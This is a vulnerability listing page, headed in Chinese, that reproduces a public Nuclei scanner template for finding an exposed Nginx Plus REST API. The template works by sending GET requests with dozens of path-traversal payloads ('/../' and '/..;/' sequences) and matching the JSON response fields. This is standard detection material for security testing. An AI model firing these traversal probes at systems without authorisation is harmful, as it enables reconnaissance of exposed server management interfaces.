nginx-api-traversal: Nginx Plus Rest API - Traversal

日期: 2025-08-01 | 影响软件: nginx-api-traversal | POC: 已公开

漏洞描述

Access to Nginx Plus Rest API was discovered.

PoC代码[已公开]

id: nginx-api-traversal

info:
  name: Nginx Plus Rest API - Traversal
  author: encodedguy
  severity: high
  description: |
    Access to Nginx Plus Rest API was discovered.
  reference:
    - https://nginx.org/en/docs/http/ngx_http_api_module.html
    - https://x.com/akshaysharma71/status/1825815869953552844
  metadata:
    verified: true
  tags: nginx,fuzz,misconfig,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/api/1/nginx"
        - "/api/2/nginx"
        - "/api/3/nginx"
        - "/api/5/nginx"
        - "/api/9/nginx"
        - "/../../../../../../api/1/nginx"
        - "/../../../../../../api/2/nginx"
        - "/../../../../../../api/3/nginx"
        - "/../../../../../../api/5/nginx"
        - "/../../../../../../api/9/nginx"
        - "/../../../../../api/1/nginx"
        - "/../../../../../api/2/nginx"
        - "/../../../../../api/3/nginx"
        - "/../../../../../api/5/nginx"
        - "/../../../../../api/9/nginx"
        - "/../../../../api/1/nginx"
        - "/../../../../api/2/nginx"
        - "/../../../../api/3/nginx"
        - "/../../../../api/5/nginx"
        - "/../../../../api/9/nginx"
        - "/../../../api/1/nginx"
        - "/../../../api/2/nginx"
        - "/../../../api/3/nginx"
        - "/../../../api/5/nginx"
        - "/../../../api/9/nginx"
        - "/../../api/1/nginx"
        - "/../../api/2/nginx"
        - "/../../api/3/nginx"
        - "/../../api/5/nginx"
        - "/../../api/9/nginx"
        - "/../api/1/nginx"
        - "/../api/2/nginx"
        - "/../api/3/nginx"
        - "/../api/5/nginx"
        - "/../api/9/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/..;/api/9/nginx"
        - "/..;/..;/..;/api/1/nginx"
        - "/..;/..;/..;/api/2/nginx"
        - "/..;/..;/..;/api/3/nginx"
        - "/..;/..;/..;/api/5/nginx"
        - "/..;/..;/..;/api/9/nginx"
        - "/..;/..;/api/1/nginx"
        - "/..;/..;/api/2/nginx"
        - "/..;/..;/api/3/nginx"
        - "/..;/..;/api/5/nginx"
        - "/..;/..;/api/9/nginx"
        - "/..;/api/1/nginx"
        - "/..;/api/2/nginx"
        - "/..;/api/3/nginx"
        - "/..;/api/5/nginx"
        - "/..;/api/9/nginx"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "version"
          - "build"
          - "address"
          - "load_timestamp"
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b8d017b0046535e527818c1f26ff7ed92a7818d31c92169a46be945e88b5917022100f11c5c02d1e6ee86712f319728904dc988fbff149b816b4f1e854ae3285c3430:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/nginx/nginx-api-traversal.yaml